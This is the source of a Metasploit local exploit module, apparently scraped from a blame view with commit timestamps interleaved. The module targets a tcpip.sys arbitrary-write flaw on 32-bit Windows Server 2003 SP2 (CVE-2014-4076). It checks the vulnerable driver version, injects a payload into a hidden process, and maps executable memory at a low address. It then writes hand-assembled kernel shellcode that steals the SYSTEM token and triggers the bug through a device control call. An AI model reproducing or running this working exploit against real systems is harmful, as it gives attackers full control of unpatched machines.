2015-01-28 18:24:39 +00:00
|
|
|
##
|
|
|
|
|
# This module requires Metasploit: http://metasploit.com/download
|
|
|
|
|
# Current source: https://github.com/rapid7/metasploit-framework
|
|
|
|
|
##
|
|
|
|
|
|
|
|
|
|
require 'msf/core'
|
|
|
|
|
require 'msf/core/exploit/local/windows_kernel'
|
|
|
|
|
require 'rex'
|
|
|
|
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Local
|
|
|
|
|
Rank = AverageRanking
|
|
|
|
|
|
|
|
|
|
include Msf::Exploit::Local::WindowsKernel
|
|
|
|
|
include Msf::Post::File
|
|
|
|
|
include Msf::Post::Windows::FileInfo
|
|
|
|
|
include Msf::Post::Windows::Priv
|
|
|
|
|
include Msf::Post::Windows::Process
|
|
|
|
|
|
|
|
|
|
def initialize(info={})
|
|
|
|
|
super(update_info(info, {
|
2015-01-29 16:57:03 +00:00
|
|
|
'Name' => 'Windows tcpip.sys Arbitrary Write Privilege Escalation',
|
2015-01-28 18:24:39 +00:00
|
|
|
'Description' => %q{
|
|
|
|
|
A vulnerability within Microsoft TCP/IP protocol driver, tcpip.sys, can allow an attacker
|
|
|
|
|
to inject memory controlled by the attacker into an arbitrary location.
|
|
|
|
|
},
|
|
|
|
|
'License' => MSF_LICENSE,
|
|
|
|
|
'Author' =>
|
|
|
|
|
[
|
|
|
|
|
'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
|
|
|
|
|
'Jay Smith <jsmith[at]korelogic.com>' # MSF module
|
|
|
|
|
],
|
|
|
|
|
'Arch' => ARCH_X86,
|
|
|
|
|
'Platform' => 'win',
|
|
|
|
|
'SessionTypes' => [ 'meterpreter' ],
|
|
|
|
|
'DefaultOptions' =>
|
|
|
|
|
{
|
|
|
|
|
'EXITFUNC' => 'thread',
|
|
|
|
|
},
|
|
|
|
|
'Targets' =>
|
|
|
|
|
[
|
|
|
|
|
['Windows Server 2003 SP2', {} ]
|
|
|
|
|
],
|
|
|
|
|
'References' =>
|
|
|
|
|
[
|
|
|
|
|
['CVE', '2014-4076'],
|
|
|
|
|
['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2015-001.txt']
|
|
|
|
|
],
|
|
|
|
|
'DisclosureDate'=> 'Nov 11 2014',
|
|
|
|
|
'DefaultTarget' => 0
|
|
|
|
|
}))
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def check
|
|
|
|
|
if sysinfo["Architecture"] =~ /wow64/i or sysinfo["Architecture"] =~ /x64/
|
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
|
2015-01-29 16:57:03 +00:00
|
|
|
return Exploit::CheckCode::Safe unless handle
|
|
|
|
|
|
2015-01-28 18:24:39 +00:00
|
|
|
session.railgun.kernel32.CloseHandle(handle)
|
|
|
|
|
|
|
|
|
|
file_path = get_env('WINDIR') << "\\system32\\drivers\\tcpip.sys"
|
|
|
|
|
unless file?(file_path)
|
|
|
|
|
return Exploit::CheckCode::Unknown
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
major, minor, build, revision, branch = file_version(file_path)
|
|
|
|
|
vprint_status("tcpip.sys file version: #{major}.#{minor}.#{build}.#{revision} branch: #{branch}")
|
|
|
|
|
|
2015-02-04 21:55:43 +00:00
|
|
|
if ("#{major}.#{minor}.#{build}" == "5.2.3790" && revision < 5440)
|
2015-01-28 18:24:39 +00:00
|
|
|
return Exploit::CheckCode::Vulnerable
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
return Exploit::CheckCode::Safe
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def create_proc
|
|
|
|
|
windir = session.sys.config.getenv('windir')
|
|
|
|
|
cmd = "#{windir}\\System32\\notepad.exe"
|
|
|
|
|
# run hidden
|
|
|
|
|
begin
|
|
|
|
|
proc = session.sys.process.execute(cmd, nil, 'Hidden' => true)
|
|
|
|
|
rescue Rex::Post::Meterpreter::RequestError
|
|
|
|
|
return nil
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
proc.pid
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
def exploit
|
|
|
|
|
if is_system?
|
|
|
|
|
fail_with(Exploit::Failure::None, 'Session is already elevated')
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
if sysinfo["Architecture"] =~ /wow64/i
|
|
|
|
|
fail_with(Failure::NoTarget, "Running against WOW64 is not supported")
|
|
|
|
|
elsif sysinfo["Architecture"] =~ /x64/
|
|
|
|
|
fail_with(Failure::NoTarget, "Running against 64-bit systems is not supported")
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
unless check == Exploit::CheckCode::Vulnerable
|
|
|
|
|
fail_with(Exploit::Failure::NotVulnerable, "Exploit not available on this system")
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
p = payload.encoded
|
|
|
|
|
new_pid = create_proc
|
|
|
|
|
|
2015-01-29 16:57:03 +00:00
|
|
|
unless new_pid
|
|
|
|
|
fail_with(Failure::Unknown, 'Unable to create a new process.')
|
2015-01-28 18:24:39 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
print_status("Injecting #{p.length} bytes into #{new_pid} memory and executing it...")
|
|
|
|
|
unless execute_shellcode(p, nil, new_pid)
|
|
|
|
|
fail_with(Failure::Unknown, 'Error while executing the payload')
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
handle = open_device('\\\\.\\tcp', 'FILE_SHARE_WRITE|FILE_SHARE_READ', 0, 'OPEN_EXISTING')
|
|
|
|
|
if handle.nil?
|
|
|
|
|
fail_with(Failure::NoTarget, "Unable to open \\\\.\\tcp device")
|
|
|
|
|
end
|
|
|
|
|
|
|
|
|
|
print_status("Storing the shellcode in memory...")
|
|
|
|
|
this_proc = session.sys.process.open
|
|
|
|
|
|
|
|
|
|
session.railgun.ntdll.NtAllocateVirtualMemory(-1, [0x1000].pack('V'), nil, [0x4000].pack('V'), "MEM_RESERVE|MEM_COMMIT", "PAGE_EXECUTE_READWRITE")
|
|
|
|
|
|
2015-01-29 16:57:03 +00:00
|
|
|
unless this_proc.memory.writable?(0x1000)
|
|
|
|
|
fail_with(Failure::Unknown, 'Failed to allocate memory')
|
2015-01-28 18:24:39 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
|
|
|
|
|
|
2015-01-29 16:57:03 +00:00
|
|
|
sc = "\x60" # save registers
|
|
|
|
|
sc << "\x64\xA1\x24\x01\x00\x00" # mov eax, [fs:0x124]
|
|
|
|
|
sc << "\x8B\x40\x38" # mov eax, [eax+0x38]
|
|
|
|
|
sc << "\x50" # push eax
|
|
|
|
|
sc << "\xBB\x04\x00\x00\x00" # mov ebx, 0x4
|
|
|
|
|
sc << "\x8B\x80\x98\x00\x00\x00" # mov eax, [eax+0x98]
|
|
|
|
|
sc << "\x2D\x98\x00\x00\x00" # sub eax, 0x98
|
|
|
|
|
sc << "\x39\x98\x94\x00\x00\x00" # cmp [eax+0x94], ebx
|
|
|
|
|
sc << "\x75\xED" # jne 0x10
|
|
|
|
|
sc << "\x8B\xB8\xD8\x00\x00\x00" # mov edi, [eax+0xd8]
|
|
|
|
|
sc << "\x83\xE7\xF8" # and edi, 0xfffffff8
|
|
|
|
|
sc << "\x58" # pop eax
|
|
|
|
|
sc << "\xBB" # mov ebx, new_pid
|
2015-01-28 18:24:39 +00:00
|
|
|
sc << [new_pid].pack('V')
|
2015-01-29 16:57:03 +00:00
|
|
|
sc << "\x8B\x80\x98\x00\x00\x00" # mov eax, [eax+0x98]
|
|
|
|
|
sc << "\x2D\x98\x00\x00\x00" # sub eax, 0x98
|
|
|
|
|
sc << "\x39\x98\x94\x00\x00\x00" # cmp [eax+0x94], ebx
|
|
|
|
|
sc << "\x75\xED" # jne 0x32
|
|
|
|
|
sc << "\x89\xB8\xD8\x00\x00\x00" # mov [eax+0xd8], edi
|
|
|
|
|
sc << "\x61" # restore registers
|
|
|
|
|
sc << "\xBA\x39\xFF\xA2\xBA" # mov edx, 0xbaa2ff39
|
|
|
|
|
sc << "\xB9\x00\x00\x00\x00" # mov ecx, 0x0
|
|
|
|
|
sc << "\xB8\x3B\x00\x00\x00" # mov eax, 0x3b
|
|
|
|
|
sc << "\x8E\xE0" # mov fs, eax
|
|
|
|
|
sc << "\x0F\x35\x00" # sysexit
|
2015-01-28 18:24:39 +00:00
|
|
|
|
|
|
|
|
this_proc.memory.write(0x28, "\x87\xFF\xFF\x38")
|
|
|
|
|
this_proc.memory.write(0x38, "\x00\x00")
|
|
|
|
|
this_proc.memory.write(0x1100, buf)
|
|
|
|
|
this_proc.memory.write(0x2b, "\x00\x00")
|
|
|
|
|
this_proc.memory.write(0x2000, sc)
|
|
|
|
|
|
|
|
|
|
print_status("Triggering the vulnerability...")
|
|
|
|
|
session.railgun.ntdll.NtDeviceIoControlFile(handle, nil, nil, nil, 4, 0x00120028, 0x1100, buf.length, 0, 0)
|
|
|
|
|
session.railgun.kernel32.CloseHandle(handle)
|
|
|
|
|
|
|
|
|
|
print_status("Checking privileges after exploitation...")
|
|
|
|
|
|
|
|
|
|
unless is_system?
|
|
|
|
|
fail_with(Failure::Unknown, "The exploitation wasn't successful")
|
|
|
|
|
end
|
|
|
|
|
|
2015-01-29 16:57:03 +00:00
|
|
|
print_good("Exploitation successful!")
|
|
|
|
|
|
2015-01-28 18:24:39 +00:00
|
|
|
end
|
|
|
|
|
|
|
|
|
|
end
|
|
|
|
|
|
